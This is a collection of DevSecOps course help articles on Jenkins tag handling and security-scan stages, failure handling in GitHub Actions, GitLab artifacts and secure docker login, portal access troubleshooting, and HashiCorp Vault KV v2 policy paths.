Advanced Jenkins Tagging, Enterprise‑Grade Pipelines, and Failure Handling in GitHub Actions Learn how to pass Git tags into Jenkins pipelines, design a production‑ready DevSecOps pipeline in Jenkins, and gracefully handle failures in GitHub Actions. Introduction In modern CI/CD workflows, metadata such as Git tags often drives release decisions, while security testing (SCA, SAST, DAST) must be baked into the pipeline to meet compliance requirements. At the same time, teams need the ability to continue a workflow even when a step fails—especially in security scanning where you want reports even on failure. This article walks you through: 1. Ensuring tag information is available inside a Jenkins pipeline (Challenge 2). 2. Building an “enterprise‑grade” Jenkins pipeline that stitches together SCA, SAST, and DAST stages. 3. Using continue-on-error and conditional expressions to allow failures in GitHub Actions. All examples are ready to copy‑paste into your own projects. 1. Passing Git Tag Information to a Jenkins Pipeline Why It Matters Tags mark release points, hot‑fixes, or any versioned artifact. When a pipeline runs on a tagged commit you often need that tag value to: - Publish a Docker image with the correct version tag. - Trigger downstream jobs that depend on the release identifier. - Store the tag in a vulnerability management platform (e.g., DefectDojo). Prerequisites | Requirement | How to Set Up | |-------------|---------------| | Multibranch Pipeline in Jenkins | Create a Multibranch Pipeline job → Point it at your GitLab repository. Jenkins will automatically discover branches and tags. | | GitLab tags | In GitLab, create a tag on the commit you want to build: git tag -a v1.2.3 -m "Release 1.2.3" → git push origin v1.2.3. | | Jenkinsfile that reads the tag | Use the built‑in env.GIT_TAG (or env.TAG_NAME depending on your Jenkins version). | Step‑by‑Step Guide 1. 
Enable tag detection multibranchPipelineJob('my-project') { branchSources { git { id('gitlab') remote('https://gitlab.com/your-repo.git') credentialsId('gitlab-creds') includes('*/') // branches includes('*') // tags (wildcard) } } } 2. Read the tag inside Jenkinsfile pipeline { agent any environment { // When the build is triggered by a tag, GIT_TAG is populated. RELEASE_TAG = "${env.GIT_TAG ?: 'no-tag'}" } stages { stage('Show Tag') { steps { echo "Running for tag: ${env.RELEASE_TAG}" } } // Example: use the tag to tag a Docker image stage('Build & Push Docker') { when { expression { return env.RELEASE_TAG != 'no-tag' } } steps { sh """ docker build -t myapp:${RELEASE_TAG} . docker push myapp:${RELEASE_TAG} """ } } } } 3. Optional: Send the tag to DefectDojo stage('Report to DefectDojo') { steps { sh """ curl -X POST https://defectdojo/api/v2/findings/ \ -H "Authorization: Token ${DOJO_TOKEN}" \ -d "title=Release ${RELEASE_TAG}" \ -d "tags=${RELEASE_TAG}" """ } } Helpful References - Jenkins blog: “Pipelines with Git tags” (May 2018) – https://www.jenkins.io/blog/2018/05/16/pipelines-with-git-tags/ - Video walkthrough (starting at 1:06): https://youtu.be/HgiI-8VrxQE?t=66 If you need a visual guide, request the “CD Jenkins Part 2” support video from the staff. 2. Designing an Enterprise‑Grade DevSecOps Pipeline in Jenkins What “Enterprise‑Grade” Means - End‑to‑end security coverage: combines Software Composition Analysis (SCA), Static Application Security Testing (SAST), and Dynamic Application Security Testing (DAST). - Reusable, modular stages that can be dropped into any project. - Integration with a central reporting hub (e.g., DefectDojo) for compliance dashboards. - Scalable – runs in parallel where possible, uses Docker containers for isolation.
Sample Jenkinsfile pipeline { agent any options { timeout(time: 60, unit: 'MINUTES') timestamps() } environment { DOJO_URL = 'https://defectdojo.example.com' DOJO_TOKEN = credentials('defectdojo-token') } stages { stage('Checkout') { steps { checkout scm } } // ---------- SCA ---------- stage('Software Composition Analysis') { parallel { stage('Dependency-Check') { agent { docker 'owasp/dependency-check' } steps { sh 'dependency-check.sh --project "$JOB_NAME" -f JSON -o reports/sca' archiveArtifacts artifacts: 'reports/sca/**', fingerprint: true } } stage('Syft SBOM') { agent { docker 'anchore/syft' } steps { sh 'syft . -o json > reports/sca/syft.json' archiveArtifacts artifacts: 'reports/sca/syft.json', fingerprint: true } } } } // ---------- SAST ---------- stage('Static Application Security Testing') { parallel { stage('Bandit (Python)') { agent { docker 'hysnsec/bandit' } steps { sh 'bandit -r . -f json -o reports/sast/bandit.json || true' archiveArtifacts artifacts: 'reports/sast/bandit.json', fingerprint: true } } stage('SpotBugs (Java)') { agent { docker 'spotbugs/spotbugs' } steps { sh 'spotbugs -textui -output reports/sast/spotbugs.xml . || true' archiveArtifacts artifacts: 'reports/sast/spotbugs.xml', fingerprint: true } } } } // ---------- DAST ---------- stage('Dynamic Application Security Testing') { agent { docker 'owasp/zap2docker-stable' } steps { sh ''' zap-baseline.py -t http://my-app:8080 -r reports/dast/zap-report.html || true ''' archiveArtifacts artifacts: 'reports/dast/**', fingerprint: true } } // ---------- Reporting ---------- stage('Upload to DefectDojo') { steps { sh ''' python upload_to_dojo.py \ --url $DOJO_URL \ --token $DOJO_TOKEN \ --engagement "CI/CD $BUILD_NUMBER" \ --scan-type "Jenkins" \ --file reports/**/*.json \ --file reports/**/*.xml \ --file reports/**/*.html ''' } } } post { always { cleanWs() } } } Key Points - Parallel execution reduces total run time.
- Each security tool runs inside a Docker container, ensuring consistent environments. - The || true pattern prevents a failing security scan from aborting the pipeline; results are still uploaded for visibility. - All artifacts are archived for later audit. How to Adapt the Template 1. Swap tools – replace Bandit with Trivy for container scanning, or add a license‑compliance scanner. 2. Add environment variables for credentials (use Jenkins Credentials Binding). 3. Customize reporting – map the upload_to_dojo.py script to your own API client if you use a different platform. 3. Allowing Failures in GitHub Actions Sometimes a security scan should never block the pipeline, but you still want the report. GitHub Actions provides two mechanisms: | Mechanism | Scope | Effect | |-----------|-------|--------| | continue-on-error: true | Job or individual step | Marks the job/step as successful even if it exits with a non‑zero code. | | if: always() | Step | Guarantees the step runs regardless of previous failures (useful for uploading artifacts). 
| Example 1 – Whole Job Continues on Error name: CI‑Security on: [push, pull_request] jobs: sast: runs-on: ubuntu-20.04 continue-on-error: true # <‑‑ Job never fails steps: - uses: actions/checkout@v2 - name: Run Bandit run: | docker run --rm -v "$(pwd)":/src hysnsec/bandit \ -r /src -f json -o /src/bandit-output.json # Upload the report even if Bandit fails - name: Upload Bandit Report if: always() uses: actions/upload-artifact@v2 with: name: Bandit path: bandit-output.json Example 2 – Only a Specific Step Continues jobs: sast: runs-on: ubuntu-20.04 steps: - uses: actions/checkout@v2 - name: Run Bandit (may fail) id: bandit run: | docker run --rm -v "$(pwd)":/src hysnsec/bandit \ -r /src -f json -o /src/bandit-output.json continue-on-error: true # <‑‑ Step marked as success - name: Upload Bandit Report if: always() # Runs no matter what happened before uses: actions/upload-artifact@v2 with: name: Bandit path: bandit-output.json Best Practices - Prefer continue-on-error at the step level when only a single tool should be “non‑blocking”. - Use if: always() on artifact‑upload steps to guarantee results are stored. - Add a comment or badge in the workflow file to remind reviewers that a step is intentionally non‑fatal. Common Questions & Tips | Question | Answer | |----------|--------| | How do I make Jenkins treat a tag as a branch? | In a Multibranch Pipeline, enable “Discover tags” under Branch Sources → Behaviors. Jenkins will then create a separate job for each tag. | | Can I run the same pipeline on both Jenkins and GitHub Actions? | Yes – keep the core logic (e.g., Docker commands) in reusable scripts stored in the repo, then invoke them from either platform’s YAML or Jenkinsfile. | | What if a security tool returns a non‑JSON output? | Convert it to JSON (or JUnit XML) before uploading to DefectDojo. Most tools provide a -f json flag; otherwise use a small wrapper script. | | Is continue-on-error safe for production releases? 
| Use it only for diagnostic or reporting steps. Critical build steps (e.g., artifact publishing) should still fail the workflow if they encounter errors. | Conclusion By correctly propagating Git tag information into Jenkins, you gain precise version control over releases. Building an enterprise‑grade pipeline that integrates SCA, SAST, and DAST ensures comprehensive security coverage while remaining modular and scalable. Finally, mastering failure‑allowance patterns in GitHub Actions lets you collect valuable security data without blocking downstream processes. Apply these patterns to your own CI/CD environment, and you’ll have a robust, compliant, and transparent DevSecOps workflow ready for enterprise adoption.

Last updated on Jan 07, 2026

GitLab CI/CD: Understanding Artifacts, the Package Registry, and YAML Configuration

GitLab CI/CD: Understanding Artifacts, the Package Registry, and YAML Configuration Introduction GitLab’s integrated CI/CD platform provides powerful tools for automating builds, tests, and deployments. Two features that often cause confusion are Artifacts and the Package Registry. While both deal with files produced during a pipeline, they serve distinct purposes. This article explains the difference between them, walks through the basics of the Package Registry, clarifies the when: always keyword, and offers practical guidance on when and how to create your .gitlab-ci.yml file. By the end, you’ll know how to store temporary build outputs, publish reusable packages, and configure your pipelines with confidence. 1. Artifacts vs. Package Registry | Aspect | Artifacts | Package Registry | |--------|---------------|----------------------| | Purpose | Temporary files generated by a pipeline (e.g., compiled binaries, test reports). | Permanent storage for reusable packages (Docker images, Maven, npm, PyPI, etc.). | | Lifecycle | Usually retained for a limited time (default 7 days) and can be automatically expired. | Persist until you delete them; they act as a versioned dependency store. | | Typical Use‑Cases | • Pass build output from one job to the next.• Provide downloadable logs or coverage reports.• Keep artifacts for debugging failed jobs. | • Host Docker images for deployment.• Publish internal npm modules.• Share Maven artifacts across micro‑services. | | Access | Downloaded via the pipeline UI or via API using the job ID. | Pulled with standard package managers (docker pull, npm install, mvn dependency:get, etc.). | | Configuration Location | Inside a job’s artifacts: block in .gitlab-ci.yml. | Defined by enabling the appropriate Package Registry feature in the project settings and publishing from a job. 
| Quick Example # .gitlab-ci.yml build: stage: build script: - make compile artifacts: paths: - build/*.jar # <-- temporary build output expire_in: 1 day publish: stage: deploy script: - docker build -t registry.example.com/myapp:$CI_COMMIT_SHA . - docker push registry.example.com/myapp:$CI_COMMIT_SHA # No artifacts block – the Docker image lives in the Package Registry In the snippet above, build creates a JAR file that is stored as an artifact for later jobs. The publish job pushes a Docker image to the Package Registry, where it can be pulled by any downstream environment. 2. What Is the GitLab Package Registry? The GitLab Package Registry is a unified, self‑hosted repository for a variety of package formats: - Docker (container images) - Maven (Java libraries) - npm (Node.js modules) - RubyGems, Python (PyPI), Conan, Helm, and more Key Benefits 1. Single Source of Truth – Store all your binaries and libraries alongside the source code. 2. Access Control – Leverage GitLab’s permission model to restrict who can publish or download packages. 3. Dependency Management – Use standard tooling (docker, mvn, npm) without external registries. 4. Traceability – Packages are linked to commits, tags, and pipeline IDs, making audits straightforward. Publishing a Package (Docker Example) # .gitlab-ci.yml docker_build: stage: build image: docker:latest services: - docker:dind script: - echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY - docker build -t $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA . - docker push $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA After the pipeline runs, the image appears under Packages & Registries → Container Registry in the project UI. 3. The when: always Keyword in Artifacts Inside the artifacts: Block test: stage: test script: npm test artifacts: when: always # <-- always upload artifacts paths: - coverage/ - Effect: The job will upload the specified paths even if the job fails. - Why use it?
To retain logs, screenshots, or coverage reports that help debug failures. Outside the artifacts: Block (Job‑Level when) cleanup: stage: cleanup script: ./scripts/cleanup.sh when: always # <-- job runs regardless of previous job status - Effect: The job itself executes no matter whether earlier jobs succeeded or failed. - Typical use‑case: Clean‑up steps, notifications, or publishing artifacts after a failure. 4. When to Create and Run .gitlab-ci.yml 1. Early Planning (Recommended) - Add a minimal .gitlab-ci.yml at the start of the project to enable CI/CD from day one. - Example: a simple lint job that runs on every push. 2. Late Addition - You can add the file later, but remember that pipelines only start after the file exists in the repository. - If you need to avoid automatic deployments on the first run, use rules or only/except to limit execution. 3. Avoiding Unintended Deployments deploy: stage: deploy script: ./deploy.sh rules: - if: $CI_COMMIT_BRANCH == "main" when: manual # <-- requires manual trigger - The rules: block ensures the deployment only runs manually on the main branch, preventing accidental pushes from triggering a production rollout. 5. Practical Tips & Common Questions Tips - Set appropriate expiration for artifacts (expire_in:) to keep storage costs low. - Version your packages using semantic versioning; GitLab automatically adds the version tag to the registry. - Leverage caching (cache:) for dependencies that don’t need to be stored as artifacts. Common Questions | Question | Answer | |----------|--------| | Can I download an artifact from a failed job? | Yes—use when: always in the artifacts: block to ensure it’s uploaded even on failure. | | Do artifacts appear in the Package Registry? | No. Artifacts are pipeline‑specific; the Package Registry holds versioned packages meant for reuse across projects. | | Do I need a separate registry for each project? | Not necessarily. 
You can push to a shared group-level registry or use the project’s own registry; permissions are inherited from the group. | | How do I limit artifact size? | Use the paths: list to include only needed files and set expire_in: to control retention. | Conclusion Understanding the distinction between Artifacts (temporary pipeline outputs) and the Package Registry (persistent, versioned packages) is essential for building efficient GitLab CI/CD pipelines. Use when: always wisely to capture valuable debugging information, and decide early whether to add your .gitlab-ci.yml file to enable continuous integration from the start. With these concepts in hand, you can streamline builds, share reusable components, and maintain clean, maintainable pipelines across your organization.

Last updated on Jan 06, 2026

Secure Docker Login and CI/CD Script Syntax in GitLab Pipelines

Secure Docker Login and CI/CD Script Syntax in GitLab Pipelines Introduction When you automate container builds and deployments with GitLab CI/CD, handling credentials safely is essential. A common pattern—echo $CI_REGISTRY_PASSWORD | docker login -u $CI_REGISTRY_USER --password-stdin $CI_REGISTRY—illustrates three best‑practice concepts: 1. Passing secrets via --password-stdin instead of the insecure -p flag. 2. Using a here‑document (<<EOF) to feed a block of commands to ssh. 3. Leveraging echo and the pipe (|) to stream the password into Docker. This article breaks down each piece, explains why it matters, and shows a complete, production‑ready example you can copy into your own .gitlab-ci.yml file. 1. Why Prefer --password-stdin Over -p The security problem with -p docker login -u myuser -p mysecret registry.example.com - The password becomes part of the process command line. - Anyone with access to the host can see it with tools like ps aux or /proc/<pid>/cmdline. - The value may also be captured in shell history or CI job logs if the runner echoes the command. How --password-stdin mitigates the risk echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY" - The password is read from standard input, never appearing in the command line. - It is not stored in the runner’s process table, reducing exposure to other users. - The secret is still protected by GitLab’s built‑in masked variable feature, which prevents it from being printed in job logs. Quick comparison | Feature | -p (plain) | --password-stdin | |---------|--------------|--------------------| | Visibility in ps | ✅ Yes | ❌ No | | Stored in shell history | ✅ Yes | ❌ No | | Works with masked CI variables | ❌ May leak | ✅ Safe | | Recommended by Docker docs | ❌ No | ✅ Yes | 2. Understanding the EOF (Here‑Document) Syntax What is a here‑document? A here‑document is a way to embed a multi‑line string directly in a shell script. 
The syntax looks like: ssh user@host <<EOF docker pull "$CI_REGISTRY/image:latest" docker stop myapp || true docker rm myapp || true docker run -d --name myapp "$CI_REGISTRY/image:latest" EOF - <<EOF tells the shell: “Everything that follows, up to a line that contains only EOF, should be fed to the preceding command’s standard input.” - The delimiter (EOF, EOT, END, etc.) can be any word you choose, as long as it matches the closing line. Why use it with ssh? - Readability – You can write a full series of commands without escaping quotes or line‑breaks. - Atomic execution – The remote shell receives the entire block as one script, reducing the risk of partial execution. - No intermediate files – The commands are streamed directly, avoiding temporary scripts on the remote host. Example in a GitLab CI job deploy_production: stage: deploy image: alpine:latest script: - | echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY" - | ssh deploy@prod.example.com <<EOF set -e docker pull "$CI_REGISTRY/image:${CI_COMMIT_SHA}" docker stop web || true docker rm web || true docker run -d --name web -p 80:80 "$CI_REGISTRY/image:${CI_COMMIT_SHA}" EOF Notice the unquoted <<EOF – variables such as ${CI_COMMIT_SHA} exist only on the GitLab runner, so they must be expanded locally before the commands are sent to the remote host. Use a single‑quoted <<'EOF' only when you want the remote shell to expand its own variables instead. 3. The Role of echo and the Pipe (|) How the pipeline works echo "$CI_REGISTRY_PASSWORD" | docker login ... --password-stdin 1. echo outputs the password (as a single line) to its standard output. 2. The pipe (|) redirects that output to the standard input of docker login. 3. Docker reads the password from stdin, authenticates, and then discards the input. Why not just write the password in the command? - Directly embedding the password (-p "$CI_REGISTRY_PASSWORD") would expose it in the process list.
- Using echo + pipe keeps the secret out of the command line while still allowing a one-liner that fits neatly into a GitLab CI script: array.

Alternative syntax (for completeness):

script:
  - docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY" <<<"$CI_REGISTRY_PASSWORD"

The <<< here-string does the same thing as echo … |, but it is a Bash feature; echo … | works in any POSIX shell and is more universally understood.

4. Putting It All Together – A Full CI/CD Example

stages:
  - build
  - push
  - deploy

variables:
  IMAGE: "$CI_REGISTRY_IMAGE:$CI_COMMIT_SHORT_SHA"

build:
  stage: build
  image: docker:latest
  services: [docker:dind]
  script:
    - docker build -t "$IMAGE" .

push:
  stage: push
  image: docker:latest
  services: [docker:dind]
  script:
    - echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY"
    - docker push "$IMAGE"

deploy:
  stage: deploy
  image: alpine:latest
  script:
    - |
      ssh deploy@prod.example.com <<EOF
      set -e
      docker pull "$IMAGE"
      docker stop app || true
      docker rm app || true
      docker run -d --name app -p 80:80 "$IMAGE"
      EOF

This pipeline builds an image, pushes it securely, and then deploys it on a remote host using a clean, readable here-document. Note the unquoted EOF delimiter in the deploy job: $IMAGE is a CI variable, so it must be expanded locally by the runner before the commands are sent to the remote host.

Common Questions

| Question | Answer |
|----------|--------|
| Do masked variables still appear in job logs? | No. GitLab masks them (replaces with *****) when they would otherwise be printed. |
| Can I use -p if I run the pipeline on a private runner? | Technically possible, but Docker recommends --password-stdin for any environment where other users could inspect processes. |
| What if my password contains newlines? | Use a masked variable that does not contain newlines, or store the credential in a Docker config file instead. |
| Is the here-document delimiter case-sensitive? | Yes. The closing line must match the opening delimiter exactly: a block opened with <<EOF must end with EOF, not eof or End. |
| Do I need to escape $ inside the here-document? | With an unquoted delimiter, the local shell expands unescaped variables; escape them (\$VAR) if the remote host should expand them instead, or use a single-quoted delimiter (<<'EOF') to prevent all local expansion. |

Tips for Secure CI/CD Pipelines

1. Always mask secret variables in GitLab (Settings > CI/CD > Variables).
2. Prefer --password-stdin for any Docker authentication.
3. Limit SSH access – use key-based auth, restrict the key to the required commands, and consider using a bastion host.
4. Enable job timeouts and resource limits on runners to avoid runaway processes.
5. Audit your .gitlab-ci.yml for accidental exposure of secrets (e.g., a stray echo $SECRET without piping).

Summary

Secure Docker login, clean multi-line remote execution, and proper use of shell pipelines are foundational skills for reliable GitLab CI/CD pipelines. By:

- passing passwords via --password-stdin,
- embedding remote command blocks with a here-document (<<EOF), and
- streaming secrets with echo … |,

you protect credentials, improve script readability, and keep your deployment process both safe and maintainable. Apply these patterns today and enjoy a smoother, more secure DevSecOps workflow.
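Tip 5 above — auditing your .gitlab-ci.yml for stray secret exposure — can be partially automated. A minimal, illustrative sketch (the regex patterns and the SECRET/PASSWORD/TOKEN naming heuristic are assumptions, not an exhaustive scanner):

```python
import re

# Patterns that commonly leak secrets in CI scripts (illustrative, not exhaustive):
# - `docker login ... -p <value>` puts the password on the command line
# - `echo $SOMETHING_SECRET` alone on a line prints the value into the job log
INSECURE_LOGIN = re.compile(r"docker\s+login\b[^\n|]*\s-p\s")
BARE_ECHO_SECRET = re.compile(r"echo\s+\"?\$\{?\w*(SECRET|PASSWORD|TOKEN)\w*\}?\"?\s*(?:$|;)")

def audit_ci_script(text: str) -> list[str]:
    """Return a list of human-readable warnings for risky lines."""
    warnings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if INSECURE_LOGIN.search(line):
            warnings.append(f"line {lineno}: docker login uses -p; prefer --password-stdin")
        if BARE_ECHO_SECRET.search(line) and "|" not in line:
            warnings.append(f"line {lineno}: secret echoed directly into the job log")
    return warnings

snippet = """
script:
  - docker login -u user -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  - echo "$CI_REGISTRY_PASSWORD" | docker login -u user --password-stdin $CI_REGISTRY
  - echo $DEPLOY_TOKEN
"""
for warning in audit_ci_script(snippet):
    print(warning)
```

A check like this makes a cheap pre-commit hook; it flags the insecure login and the bare echo while letting the piped --password-stdin line pass.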

Last updated on Jan 06, 2026

Troubleshooting Portal Access on Personal and Corporate Networks

Troubleshooting Portal Access on Personal and Corporate Networks If you’re enrolled in a DevSecOps course and the learning portal won’t load, the problem is often tied to the network you’re using rather than the platform itself. This guide walks you through the most common causes—and provides step‑by‑step solutions—for both personal devices on home networks and corporate devices on corporate networks. Why Your Portal Might Not Load | Situation | Typical Cause | Quick Indicator | |-----------|---------------|-----------------| | Personal device (home or public Wi‑Fi) | ISP or local network blocks Cloudflare, the CDN that powers our portal | Portal stays on “Loading…” for more than 30 seconds | | Company device or corporate network | Strict corporate firewalls, proxy settings, or cookie policies | Same “Loading…” message, but other internal sites work fine | | Both environments | Outdated browser, disabled JavaScript, or corrupted cache | Error appears in the browser console (F12) | Understanding which environment you’re in helps you choose the right troubleshooting path. Scenario 1 – Personal Device on a Home or Public Network 1. Verify the Issue is Network‑Related 1. Open a different website (e.g., https://www.google.com). 2. If other sites load normally, the problem is likely specific to the portal’s CDN. 2. Test with a VPN Most ISPs that block Cloudflare do so unintentionally. A VPN routes your traffic through a server that isn’t subject to those restrictions. Steps: 1. Choose a reputable VPN (e.g., NordVPN, ExpressVPN, or a free option with a solid privacy policy). 2. Connect to a server in a region where the portal is known to work (e.g., United States, Europe). 3. Reload the portal and see if it loads within a few seconds. - If it works: Your ISP or local network is blocking Cloudflare. Consider contacting your ISP for a permanent fix or continue using the VPN for course work. - If it still doesn’t work: Move on to the next troubleshooting step. 3. 
Clear Browser Cache & Cookies 1. Press Ctrl + Shift + Delete (Windows) or Cmd + Shift + Delete (Mac). 2. Select All time → Cache and Cookies → Clear data. 3. Restart the browser and try again. 4. Update or Switch Browsers - Ensure you’re using the latest version of Chrome, Edge, Firefox, or Safari. - If the problem persists, try a different browser to rule out a client‑side issue. 5. Contact Support (if needed) If none of the above resolves the issue, gather the following information before reaching out: - Browser name & version - VPN provider (if used) and server location - Screenshot of the “Loading…” screen - Any error messages from the browser console (press F12 → Console) Scenario 2 – Company Device or Corporate Network Corporate environments often enforce strict security policies that can interfere with external learning platforms. 1. Switch to a Personal Internet Connection - Mobile hotspot: Enable the hotspot on your smartphone and connect your laptop. - Home Wi‑Fi: If you’re working remotely, try your home network. If the portal loads on a personal connection, the corporate network is the blocker. 2. Use a Personal Device If you cannot change the network, try accessing the portal from a personal laptop or tablet that isn’t managed by the company’s IT policies. 3. Adjust Browser Cookie Settings (When Using a Company Device) Some enterprises force third‑party cookie restrictions that prevent the portal from storing session data. How to enable necessary cookies (Chrome example): 1. Click the lock icon next to the URL → Cookies. 2. Look for any entries marked Blocked for the portal domain. 3. Change the status to Allowed and reload the page. Tip: If your organization uses a custom proxy or web filter, you may need to add the portal’s domain (*.yourlearningplatform.com) to the proxy’s whitelist. Contact your IT department for assistance. 4. 
Disable Browser Extensions That May Interfere - Ad blockers, privacy shields, or security extensions can unintentionally block CDN resources. - Temporarily disable them, reload the portal, and see if it resolves the issue. 5. Request a Temporary Exception If the portal is essential for your certification, submit a formal request to your IT security team for a temporary exception or a “split‑tunnel” VPN that routes only the portal traffic outside the corporate firewall. Common Questions & Quick Tips | Question | Answer | |----------|--------| | Why does a VPN sometimes make the portal slower? | VPNs add extra hops; choose a server geographically close to the portal’s origin for optimal speed. | | Can I use my company’s VPN instead of a personal one? | Only if the corporate VPN does not route traffic through the same restrictive firewall. Test it first. | | Do I need to clear DNS cache? | Rarely, but if you suspect DNS poisoning, run ipconfig /flushdns (Windows) or dscacheutil -flushcache (macOS). | | Will disabling corporate cookies affect my work apps? | Only for the portal’s domain. Other corporate sites remain unaffected. | | Is there a mobile app for the portal? | Yes—download the official app from the App Store or Google Play for a smoother experience on mobile data. | Final Checklist - [ ] Test portal on a different network (mobile hotspot or VPN). - [ ] Clear browser cache, cookies, and disable interfering extensions. - [ ] Verify that your browser is up‑to‑date. - [ ] Adjust corporate cookie settings or request an IT exception if needed. - [ ] Document error details before contacting support. By following these steps, most learners can quickly regain access to the DevSecOps learning portal, whether they’re studying from home, a coffee shop, or the office. Happy learning!
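The network tests in the final checklist can be scripted. A minimal sketch — the hostnames below are placeholders for your portal and a control site, and a TCP connection on port 443 only proves basic reachability, not that the portal will fully load:

```python
import socket

def can_reach(host: str, port: int = 443, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # covers DNS failure, refusal, and timeout
        return False

# Placeholder hostnames -- replace with your portal and a known-good control site.
checks = {
    "control (google.com)": "www.google.com",
    "portal (placeholder)": "portal.example.com",
}
for label, host in checks.items():
    print(f"{label}: {'reachable' if can_reach(host) else 'BLOCKED or unreachable'}")
```

If the control site is reachable but the portal is not, that points at CDN/firewall blocking rather than a general outage — useful detail to include when contacting support.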

Last updated on Jan 06, 2026

Understanding the `/data` Segment in HashiCorp Vault Policy Paths (KV v2)

Understanding the /data Segment in HashiCorp Vault Policy Paths (KV v2)

Introduction

When working with HashiCorp Vault's key-value (KV) secrets engine, you'll often see the /data segment appear in policy definitions but not in the vault kv commands you use to read or write a secret (the raw HTTP API, by contrast, does include it). This apparent inconsistency can be confusing for newcomers to Vault, especially when configuring ACL policies for the KV version 2 (KV v2) secrets engine. In this article we'll explain why the /data prefix is required in policy paths, how KV v2 stores secrets internally, and how to write policies that correctly grant access without causing permission errors. Real-world examples and a quick FAQ will help you apply the concepts to your own Vault deployments.

1. KV v2 vs. KV v1 – What Changed?

| Feature | KV v1 | KV v2 |
|---------|-------|-------|
| Versioning | No version history | Full versioning of each secret |
| Data layout | Simple key/value store | Separate metadata and data endpoints |
| API paths | secret/<path> | secret/data/<path> (read/write) and secret/metadata/<path> (metadata) |
| Policy paths | secret/* | secret/data/* (data) and secret/metadata/* (metadata) |

KV v2 introduces versioned secrets, which means Vault must distinguish between the data of a secret (the actual key/value pairs) and the metadata (creation time, version numbers, deletion status, etc.). To keep this separation clean, the engine mounts two logical sub-paths:

- /data – used for reading and writing the secret's payload.
- /metadata – used for operations that affect the secret's version history (e.g., delete, destroy, list).

Because policies are evaluated before the request reaches the engine, the policy path must match the exact internal route Vault expects. That is why /data (or /metadata) appears in ACL rules even though the CLI shortcuts hide it from the user.

2. How Policies Are Evaluated

1. Client request – The user issues vault kv get secret/foo.
2.
Vault routing – Internally the KV v2 engine rewrites the request to secret/data/foo.
3. ACL check – Vault looks for a policy rule that matches the rewritten path (secret/data/foo).
4. Decision – If a rule permits the operation, Vault proceeds; otherwise it returns a permission error.

Because step 2 happens before the ACL check, your policy must reference the rewritten path (/data), not the user-facing shortcut.

3. Writing Correct Policy Paths

3.1 Basic Read-Only Policy

# Allow reading any secret under the "app" namespace
path "secret/data/app/*" {
  capabilities = ["read", "list"]
}

Note: No metadata capability is needed for simple reads, so we omit secret/metadata/app/*.

3.2 Full-Control Policy (Read, Write, Delete)

# Full CRUD on the "prod" namespace
path "secret/data/prod/*" {
  capabilities = ["create", "read", "update", "delete", "list"]
}

# Version-level soft delete, restore, and permanent destruction
path "secret/delete/prod/*" {
  capabilities = ["update"]
}
path "secret/undelete/prod/*" {
  capabilities = ["update"]
}
path "secret/destroy/prod/*" {
  capabilities = ["update"]
}

# Metadata: list secrets, read version history, remove a secret entirely
path "secret/metadata/prod/*" {
  capabilities = ["read", "list", "delete"]
}

Explanation
- create, read, update, delete on the data endpoint cover everyday CRUD; delete here soft-deletes the latest version.
- The delete, undelete, and destroy sub-paths take the update capability and control version-level soft deletes, restores, and permanent destruction. Note that "destroy" is an endpoint, not a capability — the valid capabilities are create, read, update, patch, delete, list, sudo, and deny.
- delete on the metadata endpoint permanently removes all versions and metadata of a secret; list on it is what powers vault kv list.

3.3 Using Wildcards Wisely

- A trailing * is a prefix glob: it matches anything after it, including nested segments, and may only appear at the end of the path.
- + matches exactly one path segment and can appear anywhere in the path.

Example for a deep hierarchy:

path "secret/data/team/*" {
  capabilities = ["read", "list"]
}

And for one variable segment:

path "secret/data/+/db" {
  capabilities = ["read"]
}

4. Practical Example: Lab Scenario

Scenario: A CI/CD pipeline needs to read the database credentials stored at secret/data/cicd/db. It must not be able to modify or delete them.

Policy:

path "secret/data/cicd/db" {
  capabilities = ["read"]
}

CLI usage (no /data needed):

# The user runs this command
vault kv get secret/cicd/db
# Internally Vault maps it to secret/data/cicd/db, which matches the policy above.

If the same policy mistakenly omitted /data:

# Incorrect policy – will never match
path "secret/cicd/db" {
  capabilities = ["read"]
}

The pipeline would receive a permission denied error because the ACL engine never sees a matching rule.

5.
Common Questions & Tips

Q1: Do I need /metadata in every policy?
A: Only when you need metadata operations — listing secrets (vault kv list), reading version history, or deleting a secret's entire metadata. Version-level delete and destroy go through the secret/delete and secret/destroy endpoints instead, and simple read/write operations need only /data.

Q2: Can I hide /data from the policy by using a wrapper script?
A: No. ACL evaluation happens before any client-side logic. The policy must reflect the internal path structure.

Q3: What happens if I mount the KV engine at a custom path?
A: Replace secret with your mount point. For a mount at kv2, the policy path becomes kv2/data/... and kv2/metadata/....

Q4: Is /data required for KV v1?
A: No. KV v1 does not have separate data/metadata endpoints, so the policy path is simply secret/*.

Tips for Writing Clean Policies

- Group related paths using a single block with a trailing * glob, or use + for a single variable segment.
- Separate data and metadata rules to follow the principle of least privilege.
- Document the mount point in your policy comments to avoid confusion when the engine is remounted.
- Test policies with vault policy read <name> and vault read sys/policy/<name> before applying them to production.

6. Quick Reference Cheat Sheet

| Action | API/CLI (user) | Internal path | Policy path needed |
|--------|----------------|---------------|--------------------|
| Read secret | vault kv get <path> | secret/data/<path> (read) | secret/data/<path> |
| Write secret | vault kv put <path> key=val | secret/data/<path> (create/update) | secret/data/<path> |
| List secrets | vault kv list <path> | secret/metadata/<path> (list) | secret/metadata/<path> |
| Delete versions | vault kv delete -versions=2 <path> | secret/delete/<path> (update) | secret/delete/<path> |
| Destroy versions | vault kv destroy -versions=2 <path> | secret/destroy/<path> (update) | secret/destroy/<path> |

Conclusion

The /data segment in HashiCorp Vault policy paths is not an optional convenience—it is a required part of the internal routing for KV v2.
